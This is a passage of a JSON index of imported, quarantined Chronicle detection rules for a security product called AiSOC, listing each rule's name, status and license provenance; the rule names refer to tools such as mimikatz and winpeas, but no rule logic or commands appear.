"google_workspace_suspicious_login_and_google_drive_file_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-suspicious-login-and-google-drive-file-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_suspicious_login_and_google_drive_file_download", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_suspicious_login_and_google_drive_file_download.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-suspicious-login-and-google-drive-file-share", "type": "detection", "name": "google_workspace_suspicious_login_and_google_drive_file_share", "description": "google_workspace_suspicious_login_and_google_drive_file_share", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-suspicious-login-and-google-drive-file-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_suspicious_login_and_google_drive_file_share", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_suspicious_login_and_google_drive_file_share.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-user-ou-changed", "type": "detection", "name": "google_workspace_user_ou_changed", "description": "google_workspace_user_ou_changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-user-ou-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_user_ou_changed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_user_ou_changed.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-user-unsuspended", "type": "detection", "name": "google_workspace_user_unsuspended", "description": "google_workspace_user_unsuspended", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-user-unsuspended.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_user_unsuspended", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_user_unsuspended.yaral" } }, { "id": "chronicle-detection-rules-graphrunner-suspicious-user-agent-strings", "type": "detection", "name": "graphrunner_suspicious_user_agent_strings", "description": "graphrunner_suspicious_user_agent_strings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/graphrunner-suspicious-user-agent-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "graphrunner_suspicious_user_agent_strings", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/graphrunner_suspicious_user_agent_strings.yaral" } }, { "id": "chronicle-detection-rules-group-modification-logging", "type": "detection", "name": "group_modification_logging", "description": "group_modification_logging", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/group-modification-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "group_modification_logging", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/compliance/windows/group_modification_logging.yaral" } }, { "id": "chronicle-detection-rules-guildma-malware-detector-sysmon-behavior", "type": "detection", "name": "guildma_malware_detector_sysmon_behavior", "description": "guildma_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/guildma-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "guildma_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/guildma_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-hack-tool-user-agent", "type": "detection", "name": "hack_tool_user_agent", "description": "hack_tool_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hack-tool-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hack_tool_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/hack_tool_user_agent.yaral" } }, { "id": "chronicle-detection-rules-hacktool-dumpert-process-dumper-default-file", "type": "detection", "name": "hacktool_dumpert_process_dumper_default_file", "description": "hacktool_dumpert_process_dumper_default_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-dumpert-process-dumper-default-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_dumpert_process_dumper_default_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_dumpert_process_dumper_default_file.yaral" } }, { "id": "chronicle-detection-rules-hacktool-dumpert-process-dumper-exec", "type": "detection", "name": "hacktool_dumpert_process_dumper_exec", "description": "hacktool_dumpert_process_dumper_exec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-dumpert-process-dumper-exec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_dumpert_process_dumper_exec", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_dumpert_process_dumper_exec.yaral" } }, { "id": "chronicle-detection-rules-hacktool-generic-process-access", "type": "detection", "name": "hacktool_generic_process_access", "description": "hacktool_generic_process_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-generic-process-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_generic_process_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_generic_process_access.yaral" } }, { "id": "chronicle-detection-rules-hacktool-ironsharp-pack-execution", "type": "detection", "name": "hacktool_ironsharp_pack_execution", "description": "hacktool_ironsharp_pack_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-ironsharp-pack-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_ironsharp_pack_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_ironsharp_pack_execution.yaral" } }, { "id": "chronicle-detection-rules-hacktool-mimikatz-execution", "type": "detection", "name": "hacktool_mimikatz_execution", "description": "hacktool_mimikatz_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-mimikatz-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_mimikatz_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_mimikatz_execution.yaral" } }, { "id": "chronicle-detection-rules-hacktool-purpleknight-execution", "type": "detection", "name": "hacktool_purpleknight_execution", "description": "hacktool_purpleknight_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-purpleknight-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_purpleknight_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_purpleknight_execution.yaral" } }, { "id": "chronicle-detection-rules-hacktool-sharp-successor-execution", "type": "detection", "name": "hacktool_sharp_successor_execution", "description": "hacktool_sharp_successor_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-sharp-successor-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_sharp_successor_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_sharp_successor_execution.yaral" } }, { "id": "chronicle-detection-rules-hacktool-use", "type": "detection", "name": "hacktool_use", "description": "hacktool_use", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-use.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_use", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/hacktool_use.yaral" } }, { "id": "chronicle-detection-rules-hacktool-winpeas-execution-patterns", "type": "detection", "name": "hacktool_winpeas_execution_patterns", "description": "hacktool_winpeas_execution_patterns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-winpeas-execution-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_winpeas_execution_patterns", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_winpeas_execution_patterns.yaral" } }, { "id": "chronicle-detection-rules-hash-prevalence", "type": "detection", "name": "hash_prevalence", "description": "hash_prevalence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hash-prevalence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hash_prevalence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/hash_prevalence.yaral" } }, { "id": "chronicle-detection-rules-hawkeye-keylogger-file-creation-and-create-process-detector-sysmon-behavior", "type": "detection", "name": "hawkeye_keylogger_file_creation_and_create_process_detector_sysmon_behavior", "description": "hawkeye_keylogger_file_creation_and_create_process_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hawkeye-keylogger-file-creation-and-create-process-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hawkeye_keylogger_file_creation_and_create_process_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/hawkeye_keylogger_file_creation_and_create_process_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-hidden-cobra-fastcash-malware-sysmon", "type": "detection", "name": "hidden_cobra_fastcash_malware_sysmon", "description": "hidden_cobra_fastcash_malware_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hidden-cobra-fastcash-malware-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hidden_cobra_fastcash_malware_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/hidden_cobra_fastcash_malware__sysmon.yaral" } }, { "id": "chronicle-detection-rules-hiding-files-with-attribexe", "type": "detection", "name": "hiding_files_with_attribexe", "description": "hiding_files_with_attribexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hiding-files-with-attribexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hiding_files_with_attribexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/hiding_files_with_attrib_exe.yaral" } }, { "id": "chronicle-detection-rules-high-risk-user-download-executable-from-macro", "type": "detection", "name": "high_risk_user_download_executable_from_macro", "description": "high_risk_user_download_executable_from_macro", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/high-risk-user-download-executable-from-macro.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "high_risk_user_download_executable_from_macro", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/network/high_risk_user_download_executable_from_macro.yaral" } }, { "id": "chronicle-detection-rules-hooking-detection-sysmon", "type": "detection", "name": "hooking_detection_sysmon", "description": "hooking_detection_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hooking-detection-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hooking_detection_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/hooking_detection__sysmon.yaral" } }, { "id": "chronicle-detection-rules-hostdomain-enumeration-with-wmic", "type": "detection", "name": "hostdomain_enumeration_with_wmic", "description": "hostdomain_enumeration_with_wmic", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hostdomain-enumeration-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hostdomain_enumeration_with_wmic", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/host_domain_enumeration_with_wmic.yaral" } }, { "id": "chronicle-detection-rules-hworm-and-njrat-ratbackdoor-sysmon", "type": "detection", "name": "hworm_and_njrat_ratbackdoor_sysmon", "description": "hworm_and_njrat_ratbackdoor_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hworm-and-njrat-ratbackdoor-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hworm_and_njrat_ratbackdoor_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/hworm_and_njrat_rat_backdoor__sysmon.yaral" } }, { "id": "chronicle-detection-rules-impacket-wmiexec-cisa-report", "type": "detection", "name": "impacket_wmiexec_cisa_report", "description": "impacket_wmiexec_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/impacket-wmiexec-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "impacket_wmiexec_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/impacket_wmiexec_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-info-certutil-urlcache", "type": "detection", "name": "info_certutil_urlcache", "description": "info_certutil_urlcache", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-certutil-urlcache.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_certutil_urlcache", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/certutil_urlcache.yaral" } }, { "id": "chronicle-detection-rules-info-command-line-regedit", "type": "detection", "name": "info_command_line_regedit", "description": "info_command_line_regedit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-command-line-regedit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_command_line_regedit", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/command_line_regedit.yaral" } }, { "id": "chronicle-detection-rules-info-dns-lookup-exact", "type": "detection", "name": "info_dns_lookup_exact", "description": "info_dns_lookup_exact", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-dns-lookup-exact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_dns_lookup_exact", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/dns_lookup_exact.yaral" } }, { "id": "chronicle-detection-rules-info-dns-lookup-partial", "type": "detection", "name": "info_dns_lookup_partial", "description": "info_dns_lookup_partial", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-dns-lookup-partial.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_dns_lookup_partial", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/dns_lookup_partial.yaral" } }, { "id": "chronicle-detection-rules-info-dns-lookup-suffix", "type": "detection", "name": "info_dns_lookup_suffix", "description": "info_dns_lookup_suffix", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-dns-lookup-suffix.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_dns_lookup_suffix", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/dns_lookup_suffix.yaral" } }, { "id": "chronicle-detection-rules-info-file-batch-executed", "type": "detection", "name": "info_file_batch_executed", "description": "info_file_batch_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-batch-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_batch_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_batch_executed.yaral" } }, { "id": "chronicle-detection-rules-info-file-batch-written", "type": "detection", "name": "info_file_batch_written", "description": "info_file_batch_written", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-batch-written.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_batch_written", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_batch_written.yaral" } }, { "id": "chronicle-detection-rules-info-file-iso-mounted", "type": "detection", "name": "info_file_iso_mounted", "description": "info_file_iso_mounted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-iso-mounted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_iso_mounted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_iso_mounted.yaral" } }, { "id": "chronicle-detection-rules-info-file-iso-written", "type": "detection", "name": "info_file_iso_written", "description": "info_file_iso_written", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-iso-written.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_iso_written", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_iso_written.yaral" } }, { "id": "chronicle-detection-rules-info-file-javascript-created", "type": "detection", "name": "info_file_javascript_created", "description": "info_file_javascript_created", 